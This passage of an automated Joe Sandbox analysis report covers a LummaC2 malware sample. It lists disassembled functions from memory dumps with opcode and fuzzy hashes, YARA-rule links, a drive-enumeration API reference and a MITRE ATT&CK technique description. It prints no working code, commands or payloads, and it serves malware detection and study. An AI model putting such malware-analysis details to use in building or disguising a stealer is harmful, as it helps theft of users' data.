Opcode Fuzzy Hash: 0dc54ad5f07c8e697c1297b686083161e428545efcf16fa32698e6d9ae707fdc
Instruction Fuzzy Hash: 9F61897260D3049FD314EF64DC857ABB7E2EBC4314F08882CE489C7295EA79D946E792

Function 00F1A0D0 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9ce08a424eef9ab602b8774e7855154cd98252b7e7bc9e02390786f04e7aebb5
Instruction ID: ecacda89ace819e42b4f333df084771d6cc82ad2ad1f16ddf18e62d96f9d6a5a
Opcode Fuzzy Hash: 9ce08a424eef9ab602b8774e7855154cd98252b7e7bc9e02390786f04e7aebb5
Instruction Fuzzy Hash: 8E517B75A093448FEB249F34DC517BB77E1EB95720F18883CD58297392E632AC41AB82

Function 00F1A510 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 936903947e46e735d11d5e5ed4515833cb1a3a24023399a30037b39c04fd7755
Instruction ID: 2b39dd0b710854db7162beb3e2c415eac0df0cc51e1ce020070cd8405358a5dd
Opcode Fuzzy Hash: 936903947e46e735d11d5e5ed4515833cb1a3a24023399a30037b39c04fd7755
Instruction Fuzzy Hash: 53512936E0A3108FD7209E29C8806E7B7A3EBD5734F19852CC491972A5D7759C86E782

Function 00EFDFC0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 710bb1965ed35d99ed84edb698320d0f536c5570fc0e07abaf2b91a579564644
Instruction ID: 32cb29dbfdb6dc0a7345fa75fc852ab7692ef11b9fac5549295b1f8b2bdab6cb
Opcode Fuzzy Hash: 710bb1965ed35d99ed84edb698320d0f536c5570fc0e07abaf2b91a579564644
Instruction Fuzzy Hash: DF616933749A884BE338997C5C622B9B9934BD2330B3D937D97B19B3F1E9A54C025340

Function 00F1CBA6 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27c8f8b97fd053f4970a503ffcf4f64040164cea033318c23a9430657cd7c9c5
Instruction ID: 3614393ed2035449085133d60e857d84f92d5ad208955114d98826099f9c36cc
Opcode Fuzzy Hash: 27c8f8b97fd053f4970a503ffcf4f64040164cea033318c23a9430657cd7c9c5
Instruction Fuzzy Hash: AB410533F583514BD718CE39885226BBBD29BCA620F199A3DC8E9D7381D938DC4646C1

Function 00F030E0 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a3c7197034646793ecdbc3aad3081af3db660b9448fd28820254ced5fc61c9c
Instruction ID: 1add0eccf1805016f6a05cbc3280fe6c90369603fb886e2de061d731642778a7
Opcode Fuzzy Hash: 8a3c7197034646793ecdbc3aad3081af3db660b9448fd28820254ced5fc61c9c
Instruction Fuzzy Hash: E951B236B19615CBE728CF28D85136A73E2FF88311F0A857CE845D7694DBB5E812EB40

Function 00F15FF0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9660528848eb795099f5dbc418725243399d0dc5ee54d9a413ace79cd833391
Instruction ID: 784db04ad44e04811a683eb50d37bd2fcaa1e593aafcf10550b4b6d9ae4cf7e8
Opcode Fuzzy Hash: c9660528848eb795099f5dbc418725243399d0dc5ee54d9a413ace79cd833391
Instruction Fuzzy Hash: 81515CB1A087548FE714DF29D89435BBBE1BBC8314F044E2DE4E987351E379DA488B82

Function 00EF92C0 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71a1e303aa0aec0d3772a4b55e177cbfce1902f2c37730d11f05270bec96a772
Instruction ID: cbc5d4d03ff428d4e711f405995bcc25e2d53ba241e379346e4c52eded907b7e
Opcode Fuzzy Hash: 71a1e303aa0aec0d3772a4b55e177cbfce1902f2c37730d11f05270bec96a772
Instruction Fuzzy Hash: 31513B72905218CBC7209F24DC927BB73E0FF95358F085569F9D5973A2E3349841DB52

Function 00EEEDB4 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 545d9023592196918b02a5974734a672471780226bfcd079e50f7431016c4a57
Instruction ID: cd111c859201884234019e0f9a84e68343464ce1737bf0024df78def2fbd9a03
Opcode Fuzzy Hash: 545d9023592196918b02a5974734a672471780226bfcd079e50f7431016c4a57
Instruction Fuzzy Hash: 5751F4756483C08BD734CB29D8807BEB7E2ABD8358F24D92DD486A7399EB315842C781

Function 00F0B078 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43c131bcb0c111df4af654bcbb9bd68e2368adeec7646e2f54367a3e895befc2
Instruction ID: a12d003affc4293541cfa53de7e038a34e5ae4bc0a0d41ab248a8164916b2763
Opcode Fuzzy Hash: 43c131bcb0c111df4af654bcbb9bd68e2368adeec7646e2f54367a3e895befc2
Instruction Fuzzy Hash: 24412575A0C3C59BE7358F2998B07B7BBD0AF66304F28586CE4DA8B282D7304505E752

Function 00F17D00 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29bd67a2e83ee6a6e87eb696f1b627dcd2526a1aa8d83bac96d96fc409cc5631
Instruction ID: 20e182ae710f3e3b5c2bd934e475e7369ca1dde1b26a6ac9e53837ba6b9ef970
Opcode Fuzzy Hash: 29bd67a2e83ee6a6e87eb696f1b627dcd2526a1aa8d83bac96d96fc409cc5631
Instruction Fuzzy Hash: 774119B2A083185BE714AE14EC41BBBBBF5EF85714F14042CF889D3241E635ED85A792

Function 00F17EA0 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49588468f4a352f4693d4c90c6e1848724b645c41352eb3d467dfdc9ac2005af
Instruction ID: 826f39b321d3a7ecad235f962df4ebe2cace2cf76b420a350ee501ed37ad8b82
Opcode Fuzzy Hash: 49588468f4a352f4693d4c90c6e1848724b645c41352eb3d467dfdc9ac2005af
Instruction Fuzzy Hash: 6B410633A196144BD304DE398C4026BBAD36BD5330F2AC73DE9B5D73D5DA798C469281

Function 00F1F040 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c75b661974f856df6c2fbfd205b434653c7c27027627bfabb8e13ceef270f6d5
Instruction ID: 2768dad0b92091c4cc74c4dfe0e475ea29558bde1e1ab6b4894db0a1f9d753bd
Opcode Fuzzy Hash: c75b661974f856df6c2fbfd205b434653c7c27027627bfabb8e13ceef270f6d5
Instruction Fuzzy Hash: F9412B71705308EFE324CA15DCD1BB6B3A6EB89728F24852CE4C6A7191C770BC55E741

Function 00F1B46A Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef7605108057b276a1dc900f096688fc4ac8b0e4f127665b5ca93a50ad06b0d9
Instruction ID: 7789bbd9637d616fc1fdccd56af939579f816bff1c02b0472b163d8361355880
Opcode Fuzzy Hash: ef7605108057b276a1dc900f096688fc4ac8b0e4f127665b5ca93a50ad06b0d9
Instruction Fuzzy Hash: 374146B5E106069BCB08CF39DC611BEBBE3FB95310B08822DD402E7355EB38A556DB84

Function 00EF6D52 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a52102d74bc794561bfc2f6fb9c8c75a6d392aa51c48d989aff2621af551bb
Instruction ID: f7f917e82d5d18c722df9d8aa17308b046501ee5b5e2fa998550f8fa3bc31dd3
Opcode Fuzzy Hash: a1a52102d74bc794561bfc2f6fb9c8c75a6d392aa51c48d989aff2621af551bb
Instruction Fuzzy Hash: 7111E4B170C208CBD328CF25D841137B792FB99318F29A12CC1C6E3251D63098579B06

Function 00EE8A20 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 293d11ecb15a4287942a121f2196c36d4946016947497cfec40f8ac486ff9ff3
Instruction ID: f34b6d6cc2daf8b3cae71528e54b27ffa092fc6ac5d9bbf5342e7940f3cb7645
Opcode Fuzzy Hash: 293d11ecb15a4287942a121f2196c36d4946016947497cfec40f8ac486ff9ff3
Instruction Fuzzy Hash: 3921FB77E619244BE310CD56CC803567796A7C9338F3EC6B8C9689B392D93BAD0386C0

Function 00F1BCDB Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf1799353edd54d6d7cf300aa422d535a6175d05a018dab21450659745864ac8
Instruction ID: ebaecd45418ed257594e74fd765260bc96ac04afc490f110da55b77a96ce56b7
Opcode Fuzzy Hash: bf1799353edd54d6d7cf300aa422d535a6175d05a018dab21450659745864ac8
Instruction Fuzzy Hash: 8D110376E14611CBCB28CF69C8512FAB7B2AB89210B19C155C855A7308E738A852DBD4

Function 00EF9605 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71d582f2c570dcb4530de1ec60b140e8261deeb0f3926a6ac2cf200062df34ae
Instruction ID: 20a585443ec186ea7066aeefd5404510bd6f0f7d102c0a3bebebd5e015d95ce4
Opcode Fuzzy Hash: 71d582f2c570dcb4530de1ec60b140e8261deeb0f3926a6ac2cf200062df34ae
Instruction Fuzzy Hash: 4D21F63160D358CBC7BA8B24E4913BBB392BBC9718F19552DC5CB93225CB319847CB91

Function 00F08640 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc211b18d18da410fba217f25384d87e58fac59f73f3e0dc3c47a62c4c04fdfa
Instruction ID: 9878f401fbf039a46761f6076e07f4669de4b17606b77ef86e33fd64e9d11bcc
Opcode Fuzzy Hash: cc211b18d18da410fba217f25384d87e58fac59f73f3e0dc3c47a62c4c04fdfa
Instruction Fuzzy Hash: 1B01D235909614DBC7188F10D84143BF7F1EB897A4F16982CE4C263296CB39EC07BB82

Function 00F09DA0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7b69c494abd83f6118a72f7de64ff912b6fa8dc0b82fccbac9464bcbb27eac
Instruction ID: 5e9c519985f2737e7070405f02bd58c641faa83ec9be8fd5ffb7c10d298662dd
Opcode Fuzzy Hash: 2e7b69c494abd83f6118a72f7de64ff912b6fa8dc0b82fccbac9464bcbb27eac
Instruction Fuzzy Hash: C501B1F1B0930147DB20EE11E8C072BB2A86F81714F08102CE98457283FBB6EC14F2A1

Function 00EF46C0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction ID: 7edfba1dce2454bd68b40441e22e141a3cbdeb9346a8a7249d42326c416b4293
Opcode Fuzzy Hash: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction Fuzzy Hash: 8201A27BA013128B8324CE5CC4D06BBB3B0FF96795B2A545DD6816B3B0D7719D158260

Function 00F010F3 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c6314007021e805d96dde9f72114c9afba3ee348e91c315b80f41b4b83c6513
Instruction ID: 1a9f6fe0e53afea35d08ba23f4ecd648dd35383565ec875c88b4662e15dd8f7a
Opcode Fuzzy Hash: 6c6314007021e805d96dde9f72114c9afba3ee348e91c315b80f41b4b83c6513
Instruction Fuzzy Hash: A8B092A5D0A458869A292A113D024AAB0680A13204F083030E84632206BA16F21AC09F

Function 00F034B7 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 246COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 00F03606

Strings

pz, xrefs: 00F036BA
pz, xrefs: 00F0376E, 00F034A8
uw, xrefs: 00F03503
xs, xrefs: 00F034FC

Memory Dump Source

Source File: 00000001.00000002.2914286235.0000000000EE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000001.00000002.2914262207.0000000000EE0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914317564.0000000000F20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914333543.0000000000F23000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914349823.0000000000F27000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.2914365952.0000000000F31000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ee0000_LummaC2.jbxd

Similarity

API ID: DrivesLogical
String ID: pz$pz$uw$xs
API String ID: 999431828-3977666006
Opcode ID: b10c742410f714907bc86f8a91ac9771d0fdfefef19e1619046b321df7b35df2
Instruction ID: 51bbb4b1afcdb2ac3e873587f2361bc6df9bd2c835ba02f6590163c3b1bc4550
Opcode Fuzzy Hash: b10c742410f714907bc86f8a91ac9771d0fdfefef19e1619046b321df7b35df2
Instruction Fuzzy Hash: 668114B5A01206CFC714CF64DC91AAABBB0FF1A314B4991A8D445AF362D335D942DFC0

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre
